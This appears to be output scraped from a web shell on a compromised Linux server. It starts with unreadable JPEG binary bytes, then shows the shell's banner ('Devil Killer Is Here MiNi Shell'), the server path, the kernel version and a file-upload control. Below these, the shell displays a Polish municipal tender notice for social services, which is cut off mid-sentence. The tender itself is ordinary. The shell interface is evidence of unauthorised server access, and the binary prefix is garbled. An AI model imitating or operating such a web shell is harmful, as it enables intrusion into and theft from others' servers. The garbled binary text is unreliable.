JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /proc/thread-self/root/home/vmanager/www/common/web/tenders/20250515/

Linux 9dbcd5f6333d 5.15.0-153-generic #163-Ubuntu SMP Thu Aug 7 16:37:18 UTC 2025 x86_64
Upload File :
Current File : //proc/thread-self/root/home/vmanager/www/common/web/tenders/20250515/0023358501-N-2025.html

<!-- Version 1.0.0 --><style type="text/css"> .normal { color: black; } h1.title { }</style> <h1 class="text-center mt-5 mb-5">Ogłoszenie o zamówieniu<br/> Usługi<br/> USŁUGI SPOŁECZNE DLA UCZESTNIKÓW PROJEKTU „Q samodzielności II” </h1> <h2 class="bg-light p-3 mt-4">SEKCJA I - ZAMAWIAJĄCY</h2> <h3 class="mb-0">1.1.) Rola zamawiającego</h3> <p class="mb-0">Postępowanie prowadzone jest samodzielnie przez zamawiającego</p> <h3 class="mb-0">1.2.) Nazwa zamawiającego: <span class="normal">GMINA SĘKOWA</span></h3> <h3 class="mb-0">1.4) Krajowy Numer Identyfikacyjny: <span class="normal">REGON 491892682</span></h3><h3 class="mb-0">1.5) Adres zamawiającego </h3> <h3 class="mb-0">1.5.1.) Ulica: <span class="normal">Sękowa 252</span></h3> <h3 class="mb-0">1.5.2.) Miejscowość: <span class="normal">Sękowa</span></h3> <h3 class="mb-0">1.5.3.) Kod pocztowy: <span class="normal">38-307</span></h3> <h3 class="mb-0">1.5.4.) Województwo: <span class="normal">małopolskie</span></h3> <h3 class="mb-0">1.5.5.) Kraj: <span class="normal">Polska</span></h3> <h3 class="mb-0">1.5.6.) Lokalizacja NUTS 3: <span class="normal">PL218 - Nowosądecki</span></h3> <h3 class="mb-0">1.5.7.) Numer telefonu: <span class="normal">0183518016</span></h3> <h3 class="mb-0">1.5.9.) Adres poczty elektronicznej: <span class="normal">ugsekowa@sekowa.pl</span></h3> <h3 class="mb-0">1.5.10.) Adres strony internetowej zamawiającego: <span class="normal">https://www.sekowa.pl</span></h3> <h3 class="mb-0"> 1.6.) Rodzaj zamawiającego: <span class="normal">Zamawiający publiczny - jednostka sektora finansów publicznych - jednostka samorządu terytorialnego</span> </h3> <h3 class="mb-0"> 1.7.) Przedmiot działalności zamawiającego: <span class="normal">Ogólne usługi publiczne</span> </h3> <h2 class="bg-light p-3 mt-4">SEKCJA II – INFORMACJE PODSTAWOWE</h2> <h3 class="mb-0">2.1.) Ogłoszenie dotyczy: </h3> <p class="mb-0"> Zamówienia publicznego </p> <h3 class="mb-0">2.2.) Ogłoszenie dotyczy usług społecznych i innych szczególnych usług: <span class="normal">Tak</span></h3> <h3 class="mb-0">2.3.) Nazwa zamówienia albo umowy ramowej: </h3> <p class="mb-0"> USŁUGI SPOŁECZNE DLA UCZESTNIKÓW PROJEKTU „Q samodzielności II” </p> <h3 class="mb-0">2.4.) Identyfikator postępowania: <span class="normal">ocds-148610-6e8f6e10-203b-4cc4-af71-897c4e503a68</span></h3> <h3 class="mb-0">2.5.) Numer ogłoszenia: <span class="normal">2025/BZP 00233585</span></h3> <h3 class="mb-0">2.6.) Wersja ogłoszenia: <span class="normal">01</span></h3> <h3 class="mb-0">2.7.) Data ogłoszenia: <span class="normal">2025-05-15</span></h3> <h3 class="mb-0">2.8.) Zamówienie albo umowa ramowa zostały ujęte w planie postępowań: <span class="normal">Tak</span></h3> <h3 class="mb-0">2.9.) Numer planu postępowań w BZP: <span class="normal">2025/BZP 00012914/03/P</span></h3> <h3 class="mb-0">2.10.) Identyfikator pozycji planu postępowań: </h3> <p class="mb-0">1.3.1 Usługi społeczne dla uczestników projektu &#34;Q samodzielności II&#34;</p> <h3 class="mb-0">2.11.) O udzielenie zamówienia mogą ubiegać się wyłącznie wykonawcy, o których mowa w art. 94 ustawy: <span class="normal">Tak</span></h3> <h3 class="mb-0">2.12.) Rodzaj wykonawców, którzy mogą ubiegać się o udzielenie zamówienia: </h3> <p class="mb-0">art. 94 ust. 1 pkt 1) ustawy</p> <p class="mb-0">art. 94 ust. 1 pkt 2) ustawy</p> <p class="mb-0">art. 94 ust. 1 pkt 3) ustawy</p> <p class="mb-0">art. 94 ust. 1 pkt 4) ustawy</p> <p class="mb-0">art. 94 ust. 1 pkt 5) ustawy</p> <p class="mb-0">art. 94 ust. 1 pkt 6) ustawy</p> <p class="mb-0">art. 94 ust. 1 pkt 7) ustawy</p> <p class="mb-0">art. 94 ust. 1 pkt 8) ustawy</p> <p class="mb-0">art. 94 ust. 1 pkt 9) ustawy</p> <p class="mb-0">art. 94 ust. 1 pkt 10) ustawy</p> <h3 class="mb-0">2.13.) O zamówienie mogą ubiegać się wyłącznie wykonawcy, którzy spełniają warunki określone w art. 361 ustawy – usługi społeczne: <span class="normal">Nie</span></h3> <h3 class="mb-0">2.14.) Czy zamówienie albo umowa ramowa dotyczy projektu lub programu współfinansowanego ze środków Unii Europejskiej: <span class="normal">Tak</span></h3> <h3 class="mb-0">2.15.) Nazwa projektu lub programu</h3> <p class="mb-0"> Projekt „Q samodzielności II” realizowany na podstawie umowy nr FEMP.06.26-IP.01-0251/24-00 o dofinansowanie w ramach programu Fundusze Europejskie dla Małopolski 2021-2027 </p> <h3 class="mb-0">2.16.) Tryb udzielenia zamówienia wraz z podstawą prawną</h3> <p class="mb-0"> Zamówienie udzielane jest w trybie podstawowym na podstawie: art. 275 pkt 1 ustawy </p> <h2 class="bg-light p-3 mt-4">SEKCJA III – UDOSTĘPNIANIE DOKUMENTÓW ZAMÓWIENIA I KOMUNIKACJA</h2> <h3 class="mb-0">3.1.) Adres strony internetowej prowadzonego postępowania</h3> https://platformazakupowa.pl/transakcja/1109908 <h3 class="mb-0">3.2.) Zamawiający zastrzega dostęp do dokumentów zamówienia: <span class="normal">Nie</span></h3> <h3 class="mb-0">3.4.) Wykonawcy zobowiązani są do składania ofert, wniosków o dopuszczenie do udziału w postępowaniu, oświadczeń oraz innych dokumentów wyłącznie przy użyciu środków komunikacji elektronicznej: <span class="normal">Tak</span></h3> <h3 class="mb-0">3.5.) Informacje o środkach komunikacji elektronicznej, przy użyciu których zamawiający będzie komunikował się z wykonawcami - adres strony internetowej: <span class="normal">Przedmiotowe postępowanie prowadzone jest przy użyciu środków komunikacji elektronicznej. W postępowaniu o udzielenie zamówienia komunikacja między zamawiającym a wykonawcami, przekazywanie dokumentów elektronicznych odbywa się wyłącznie przy użyciu środków komunikacji elektronicznej tj.:<br/>a) platformy zakupowej platformazakupowa.pl Open Nexus Sp. z o.o., zwanej platformą zakupową, pod adresem: <br/>https://platformazakupowa.pl/transakcja/1109908<br/> Korzystanie z platformy zakupowej przez Wykonawcę jest bezpłatne. <br/>b) poczty elektronicznej e-mail: k.wrzesinska@sekowa.pl - w sytuacjach awaryjnych, np. gdy korzystanie z platformy byłoby chwilowo utrudnione.</span></h3> <h3 class="mb-0">3.6.) Wymagania techniczne i organizacyjne dotyczące korespondencji elektronicznej: <span class="normal">Regulamin, warunki, zasady, instrukcje i szczegółowe informacje dotyczące korzystania z platformy zakupowej, wymagania techniczne i organizacyjne sporządzania, wysyłania i odbierania korespondencji elektronicznej dostępne są na stronie platformy zakupowej Open Nexus Sp. z o.o. pod adresem: https://platformazakupowa.pl.</span></h3> <h3 class="mb-0">3.8.) Zamawiający wymaga sporządzenia i przedstawienia ofert przy użyciu narzędzi elektronicznego modelowania danych budowlanych lub innych podobnych narzędzi, które nie są ogólnie dostępne: <span class="normal">Nie</span></h3> <h3 class="mb-0">3.12.) Oferta - katalog elektroniczny: <span class="normal">Nie dotyczy</span></h3> <h3 class="mb-0">3.14.) Języki, w jakich mogą być sporządzane dokumenty składane w postępowaniu: </h3> <p class="mb-0">polski</p> <h2 class="bg-light p-3 mt-4">SEKCJA IV – PRZEDMIOT ZAMÓWIENIA</h2><h3 class="mb-0">4.1.) Informacje ogólne odnoszące się do przedmiotu zamówienia.</h3> <h3 class="mb-0">4.1.1.) Przed wszczęciem postępowania przeprowadzono konsultacje rynkowe: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.1.2.) Numer referencyjny: <span class="normal">IZ.271.3.2025</span></h3> <h3 class="mb-0">4.1.3.) Rodzaj zamówienia: <span class="normal">Usługi</span></h3> <h3 class="mb-0">4.1.4.) Zamawiający udziela zamówienia w częściach, z których każda stanowi przedmiot odrębnego postępowania: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.1.8.) Możliwe jest składanie ofert częściowych: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.1.13.) Zamawiający uwzględnia aspekty społeczne, środowiskowe lub etykiety w opisie przedmiotu zamówienia: <span class="normal">Tak</span></h3> <h3 class="mb-0">4.1.14.) Określenie aspektów społecznych, środowiskowych lub etykiet w opisie przedmiotu zamówienia: </h3> <p class="mb-0">Zamawiający uwzględnił wymagania w zakresie dostępności dla osób niepełnosprawnych oraz projektowania z przeznaczeniem dla wszystkich użytkowników, zgodnie z art. 100 ust. 1 ustawy</p><h3 class="mb-0">4.2. Informacje szczegółowe odnoszące się do przedmiotu zamówienia:</h3> <h3 class="mb-0">4.2.2.) Krótki opis przedmiotu zamówienia</h3> <p class="mb-0"> Przedmiotem zamówienia jest świadczenie usług społecznych dla 64 uczestników projektu pn.: „Q samodzielności II”, stanowiących usługi społeczne i inne szczególne usługi określone w załączniku XIV do Dyrektywy Parlamentu Europejskiego i Rady nr 2014/24/UE z dnia 26 lutego 2014 r. w sprawie zamówień publicznych, uchylająca dyrektywę 2004/18/WE, w tym:<br/>1) indywidualne wsparcie usprawniające - wsparcie skierowane do 23 UP, w formie indywidualnej w wymiarze 6 h/osobę – łącznie 138 godzin; za godzinę realizowanego wsparcia przyjmuje się 60 minut;<br/>2) trening umiejętności społecznych w formie stacjonarnej - wsparcie skierowane do 15 UP, w podziale na dwie grupy w wymiarze 18 godzin dla każdej z grup - łącznie 36 godzin; za godzinę realizowanego wsparcia przyjmuje się 45 minut zajęć edukacyjnych i 15 minut przerwy;<br/>3) trening umiejętności społecznych w formie wyjazdowej - wsparcie skierowane do 30 UP, w podziale na dwie grupy w wymiarze 30 godzin dla każdej z grup - łącznie 60 godzin; za godzinę realizowanego wsparcia przyjmuje się 45 minut zajęć edukacyjnych i 15 minut przerwy;<br/>4) warsztat zdrowego stylu życia w formie wyjazdowej - wsparcie skierowane do 34 UP, w podziale na dwie grupy, w wymiarze 18 godzin dla każdej z grup - łącznie 36 godzin; za godzinę realizowanego wsparcia przyjmuje się 45 minut zajęć edukacyjnych i 15 minut przerwy;<br/>5) warsztat poruszania się po rynku pracy w formie stacjonarnej - wsparcie skierowane do 19 UP, w podziale na dwie grupy, w wymiarze 18 godzin dla każdej z grup - łącznie 36 godzin; za godzinę realizowanego wsparcia przyjmuje się 45 minut zajęć edukacyjnych i 15 minut przerwy;<br/>6) warsztat kompetencji rodzicielskich w formie stacjonarnej - wsparcie skierowane do 7 UP, w formie indywidualnej w wymiarze 18 h/osobę - łącznie 126 godzin; za godzinę realizowanego wsparcia przyjmuje się 45 minut zajęć edukacyjnych i 15 minut przerwy;<br/>7) warsztat radzenia sobie ze stresem w formie stacjonarnej - wsparcie skierowane do 30 UP, w podziale na dwie grupy w wymiarze 18 godzin dla każdej z grup - łącznie 36 godzin; za godzinę realizowanego wsparcia przyjmuje się 45 minut zajęć edukacyjnych i 15 minut przerwy;<br/>8) wsparcie specjalistów dla dzieci z niepełnosprawnością - wsparciem objętych zostanie 5 UP, w formie indywidualnej dzieci z niepełnosprawnościami, po 40 h/osobę w wymiarze łącznie 200 godzin; za godzinę realizowanego wsparcia przyjmuje się 60 minut; wsparcie obejmuje:<br/>a) trening słuchowy - wsparcie skierowane do 5 UP w formie indywidualnej po 10 h/osobę w wymiarze łącznie 50 godzin; za godzinę realizowanego wsparcia przyjmuje się 60 minut;<br/>b) refleksologia - wsparcie skierowane do 3 UP w formie indywidualnej po 10 h/osobę w wymiarze łącznie 30 godzin; za godzinę realizowanego wsparcia przyjmuje się 60 minut;<br/>c) terapia integracji sensorycznej - wsparcie skierowane do 4 UP w formie indywidualnej po 10 h/osobę w wymiarze łącznie 40 godzin; za godzinę realizowanego wsparcia przyjmuje się 60 minut;<br/>d) trening rozwijający umiejętności szkolne w tym społeczne - wsparcie skierowane do 4 UP w formie indywidualnej po 10 h/osobę w wymiarze łącznie 40 godzin; za godzinę realizowanego wsparcia przyjmuje się 60 minut;<br/>e) zajęcia logopedyczne - wsparcie skierowane do 2 UP w formie indywidualnej po 10 h/osobę wymiarze łącznie 20 godzin; za godzinę realizowanego wsparcia przyjmuje się 60 minut;<br/>f) psychoterapia - wsparcie skierowane do 2 UP w formie indywidualnej po 10 h/osobę w wymiarze łącznie 20 godzin; za godzinę realizowanego wsparcia przyjmuje się 60 minut. </p> <h3 class="mb-0">4.2.6.) Główny kod CPV: <span class="normal">80500000-9 - Usługi szkoleniowe</span></h3> <h3 class="mb-0">4.2.7.) Dodatkowy kod CPV: </h3> <p class="mb-0">80510000-2 - Usługi szkolenia specjalistycznego</p> <p class="mb-0">80570000-0 - Usługi szkolenia w dziedzinie rozwoju osobistego</p> <p class="mb-0">85312000-9 - Usługi opieki społecznej nieobejmujące miejsc noclegowych</p> <p class="mb-0">85121270-6 - Usługi psychiatryczne lub psychologiczne</p> <p class="mb-0">85312320-8 - Usługi doradztwa</p> <h3 class="mb-0">4.2.8.) Zamówienie obejmuje opcje: <span class="normal">Nie</span></h3> <!-- realizacja do --> <h3 class="mb-0">4.2.10.) Okres realizacji zamówienia albo umowy ramowej: <span class="normal">do 2025-12-15</span></h3> <h3 class="mb-0">4.2.11.) Zamawiający przewiduje wznowienia: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.2.13.) Zamawiający przewiduje udzielenie dotychczasowemu wykonawcy zamówień na podobne usługi lub roboty budowlane: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.3.) Kryteria oceny ofert</h3> <h3 class="mb-0">4.3.2.) Sposób określania wagi kryteriów oceny ofert: <span class="normal"> Punktowo </span></h3> <h3 class="mb-0">4.3.3.) Stosowane kryteria oceny ofert: <span class="normal"> Kryterium ceny oraz kryteria jakościowe </span></h3> <h3 class="mb-0">Kryterium 1</h3> <h3 class="mb-0">4.3.5.) Nazwa kryterium: <span class="normal">Cena</span></h3> <h3 class="mb-0">4.3.6.) Waga: <span class="normal">60</span></h3> <h3 class="mb-0">Kryterium 2</h3> <h3 class="mb-0">4.3.4.) Rodzaj kryterium: </h3> organizacja, kwalifikacje zawodowe i doświadczenie osób wyznaczonych do realizacji zamówienia <h3 class="mb-0">4.3.5.) Nazwa kryterium: <span class="normal">Doświadczenie koordynatora usług</span></h3> <h3 class="mb-0">4.3.6.) Waga: <span class="normal">40</span></h3> <h3 class="mb-0">4.3.10.) Zamawiający określa aspekty społeczne, środowiskowe lub innowacyjne, żąda etykiet lub stosuje rachunek kosztów cyklu życia w odniesieniu do kryterium oceny ofert: <span class="normal">Nie</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA V - KWALIFIKACJA WYKONAWCÓW</h2> <h3 class="mb-0">5.1.) Zamawiający przewiduje fakultatywne podstawy wykluczenia: <span class="normal">Nie</span></h3> <h3 class="mb-0">5.3.) Warunki udziału w postępowaniu: <span class="normal">Tak</span></h3> <h3 class="mb-0">5.4.) Nazwa i opis warunków udziału w postępowaniu.</h3> 1. Wykonawca musi wykazać a)	w okresie ostatnich trzech lat przed upływem terminu składania ofert w niniejszym postępowaniu, a jeżeli okres prowadzenia działalności jest krótszy – w tym okresie, wykonał, co najmniej 3 (trzy) usługi, w tym jedną o wartości brutto co najmniej 200 000,00 zł (słownie: dwieście tysięcy złotych 00/100), w zakresie usług społecznych skierowanych do osób należących do jednej lub kilku z poniższych grup: <br/>a) osób lub rodziny korzystające ze świadczeń z pomocy społecznej zgodnie z ustawą z dnia 12 marca 2004r. o pomocy społecznej lub kwalifikujące się do objęcia wsparciem pomocy społecznej, tj. spełniające co najmniej jedną z przesłanek określonych w art. 7 tej ustawy,<br/>b) osoby przebywające w pieczy zastępczej lub opuszczające pieczę zastępczą oraz rodziny przeżywające trudności w pełnieniu funkcji, opiekuńczo-wychowawczych, o których mowa w ustawie z dnia 9 czerwca 2011r. o wspieraniu rodziny i systemie pieczy zastępczej,<br/>c) osoby z niepełnosprawnościami,<br/>d) członkowie gospodarstw domowych sprawujący opiekę nad osobą potrzebującą wsparcia w codziennym funkcjonowaniu,<br/>e) osoby potrzebujące wsparcia w codziennym funkcjonowaniu,<br/>f) osoby korzystające z programu Fundusze Europejskie na Pomoc Żywnościową 2021-2027,<br/>g) otoczenie ww. grup docelowych (m.in. rodziny, środowiska lokalne), rodziny osób z niepełnosprawnościami, rodziny z dziećmi.<br/>Obejmujące usługę organizacji szkoleń/warsztatów kompetencyjnych z co najmniej 5 (pięciu) dowolnych spośród 8 następujących szkoleń/warsztatów kompetencyjnych:<br/>a) Indywidualne wsparcie usprawniające <br/>b) Trening umiejętności społecznych w formie stacjonarnej<br/>c) Trening umiejętności społecznych w formie wyjazdowej<br/>d) Warsztat zdrowego stylu życia w formie wyjazdowej <br/>e) Warsztat poruszania się po rynku pracy w formie stacjonarnej <br/>f) Warsztat kompetencji rodzicielskich w formie stacjonarnej<br/>g) Warsztat radzenia sobie ze stresem w formie stacjonarnej<br/>h) Wsparcie specjalistów dla dzieci z niepełnosprawnością w tym co najmniej jeden trening umiejętności społecznych w formie wyjazdowej dla dzieci lub osób niepełnosprawnych. <br/>2. Wykonawca musi dysponować co najmniej 1 (jedną) osobą do pełnienia funkcji koordynatora usług, która organizowała i koordynowała, co najmniej 1 (jedną) usługę o wartości brutto co najmniej 200 000,00 zł (słownie: dwieście tysięcy złotych 00/100), w zakresie usług społecznych, realizowanych na rzecz osób należących do jednej z poniższych grup:<br/>a) osób lub rodziny korzystające ze świadczeń z pomocy społecznej zgodnie z ustawą z dnia 12 marca 2004r. o pomocy społecznej lub kwalifikujące się do objęcia wsparciem pomocy społecznej, tj. spełniające co najmniej jedną z przesłanek określonych w art. 7 tej ustawy,<br/>b) osoby przebywające w pieczy zastępczej lub opuszczające pieczę zastępczą oraz rodziny przeżywające trudności w pełnieniu funkcji, opiekuńczo-wychowawczych, o których mowa w ustawie z dnia 9 czerwca 2011r. o wspieraniu rodziny i systemie pieczy zastępczej,<br/>c) osoby z niepełnosprawnościami,<br/>d) członkowie gospodarstw domowych sprawujący opiekę nad osobą potrzebującą wsparcia w codziennym funkcjonowaniu,<br/>e) osoby potrzebujące wsparcia w codziennym funkcjonowaniu,<br/>f) osoby korzystające z programu Fundusze Europejskie na Pomoc Żywnościową 2021-2027,<br/>g) otoczenie ww. grup docelowych (m.in. rodziny, środowiska lokalne), rodziny osób z niepełnosprawnościami, rodziny z dziećmi,<br/>obejmującą usługę organizacji szkoleń/warsztatów kompetencyjnych z co najmniej 5 (pięciu) dowolnych spośród 8 następujących szkoleń/warsztatów kompetencyjnych:<br/>- indywidualne wsparcie usprawniające <br/>- trening umiejętności społecznych w formie stacjonarnej<br/>- trening umiejętności społecznych w formie wyjazdowej<br/>- warsztat zdrowego stylu życia w formie wyjazdowej <br/>- warsztat poruszania się po rynku pracy w formie stacjonarnej <br/>- warsztat kompetencji rodzicielskich w formie stacjonarnej<br/>- warsztat radzenia sobie ze stresem w formie stacjonarnej<br/>- wsparcie specjalistów dla dzieci z niepełnosprawnością.<br/>3. W odniesieniu do warunku, o którym mowa w pkt 1 wykonawcy wspólnie ubiegający się o udzielenie zamówienia mogą polegać na zdolnościach tych z wykonawców, którzy wykonają usługi, do realizacji których te zdolności są wymagane. <h3 class="mb-0">5.5.) Zamawiający wymaga złożenia oświadczenia, o którym mowa w art.125 ust. 1 ustawy: <span class="normal">Tak</span></h3> <h3 class="mb-0"> 5.6.) Wykaz podmiotowych środków dowodowych na potwierdzenie niepodlegania wykluczeniu: <span class="normal">1) Oświadczenia wykonawcy, w zakresie art. 108 ust. 1 pkt 5 ustawy PZP, o braku przynależności do tej samej grupy kapitałowej, w rozumieniu ustawy z dnia 16.02.2007r. o ochronie konkurencji i konsumentów, z innym wykonawcą, który złożył odrębną ofertę, albo oświadczenia o przynależności do tej samej grupy kapitałowej wraz z dokumentami lub informacjami potwierdzającymi przygotowanie oferty niezależnie od innego wykonawcy należącego do tej samej grupy kapitałowej<br/>2) Oświadczenia o aktualności informacji zawartych w oświadczeniu, o którym mowa w art. 125 ust. 1 ustawy PZP, w zakresie podstaw wykluczenia z postępowania wskazanych przez Zamawiającego</span> </h3> <h3 class="mb-0"> 5.7.) Wykaz podmiotowych środków dowodowych na potwierdzenie spełniania warunków udziału w postępowaniu: <span class="normal">1) Wykaz usług wykonanych w okresie ostatnich 3 lat przed upływem terminu składania ofert, a jeżeli okres prowadzenia działalności jest krótszy – w tym okresie, wraz z podaniem ich wartości, przedmiotu, dat wykonania i podmiotów, na rzecz których usługi zostały wykonane oraz załączeniem dowodów określających, czy te usługi zostały wykonane należycie), przy czym dowodami, o których mowa, są referencje bądź inne dokumenty sporządzone przez podmiot, na rzecz którego usługi zostały wykonane, a jeżeli wykonawca z przyczyn niezależnych od niego nie jest w stanie uzyskać tych dokumentów – oświadczenie wykonawcy; <br/>2) Wykaz osób skierowanych przez wykonawcę do realizacji zamówienia publicznego, w szczególności odpowiedzialnych za świadczenie usług, kontrolę jakości lub kierowanie robotami budowlanymi, wraz z informacjami na temat ich kwalifikacji zawodowych, uprawnień, doświadczenia i wykształcenia niezbędnych do wykonania zamówienia publicznego, a także zakresu wykonywanych przez nie czynności oraz informacją o podstawie do dysponowania tymi osobami.</span> </h3> <h3 class="mb-0">5.11.) Wykaz innych wymaganych oświadczeń lub dokumentów: </h3> 1. Do oferty należy dołączyć:<br/>1) informację o osobie wskazanej przez Wykonawcę do wykonywania funkcji Koordynatora usług wraz z danymi na temat jej doświadczenia w zakresie organizowania i koordynacji zadań obejmujących usługi społeczne, realizowane na rzecz osób należących do jednej z grup: <br/>- osób lub rodziny korzystające ze świadczeń z pomocy społecznej zgodnie z ustawą z dnia 12 marca 2004r. o pomocy społecznej lub kwalifikujące się do objęcia wsparciem pomocy społecznej, tj. spełniające co najmniej jedną z przesłanek określonych w art. 7 tej ustawy,<br/>- osoby przebywające w pieczy zastępczej lub opuszczające pieczę zastępczą oraz rodziny przeżywające trudności w pełnieniu funkcji, opiekuńczo-wychowawczych, o których mowa w ustawie z dnia 9 czerwca 2011r. o wspieraniu rodziny i systemie pieczy zastępczej,<br/>- osoby z niepełnosprawnościami,<br/>- członkowie gospodarstw domowych sprawujący opiekę nad osobą potrzebującą wsparcia w codziennym funkcjonowaniu,<br/>- osoby potrzebujące wsparcia w codziennym funkcjonowaniu,<br/>- osoby korzystające z programu Fundusze Europejskie na Pomoc Żywnościową 2021-2027,<br/>- otoczenie ww. grup docelowych (m.in. rodziny, środowiska lokalne), rodziny osób z niepełnosprawnościami, rodziny z dziećmi, w tym doświadczenia w organizacji i realizacji grupowych usług wsparcia dla dzieci lub osób niepełnosprawnych w formie wyjazdowych warsztatów / szkoleń kompetencji społecznych;<br/>2) dokumenty potwierdzające, że Wykonawca spełnia kryteria udziału w postępowaniu o udzielenie zamówienia zastrzeżonego (art. 94 ust. 1 ustawy PZP), tj. dokumentów potwierdzających status wykonawcy jako zakładu pracy chronionej lub spółdzielni socjalnej lub dokumentów potwierdzających prowadzenie przez wykonawcę lub przez jego wyodrębnioną organizacyjnie jednostkę, która będzie realizowała zamówienie, działalności, której głównym celem jest społeczna i zawodowa integracja osób społecznie marginalizowanych; w szczególności dokumentem potwierdzającym może być decyzja o nadaniu statusu przedsiębiorstwa społecznego;<br/>3) oświadczenie Wykonawcy dotyczące spełniania wymogu określonego w art. 94 ust. 1 ustawy Pzp;<br/>4) zobowiązanie podmiotu udostępniającego zasoby do oddania mu do dyspozycji niezbędnych zasobów na potrzeby realizacji danego zamówienia lub inny podmiotowy środek dowodowy potwierdzający, że Wykonawca realizując zamówienie, będzie dysponował niezbędnymi zasobami tych podmiotów;<br/>5) oświadczenie, z którego wynika, które usługi wykonają poszczególni wykonawcy (jeżeli dotyczy).<br/>2. Wykonawca przed zawarciem umowy zobowiązany jest do złożenia oświadczenia potwierdzającego, że osoby sprawujące opiekę oraz wszystkie inne osoby mający kontakt z dziećmi (np. trenerzy) zostały sprawdzone 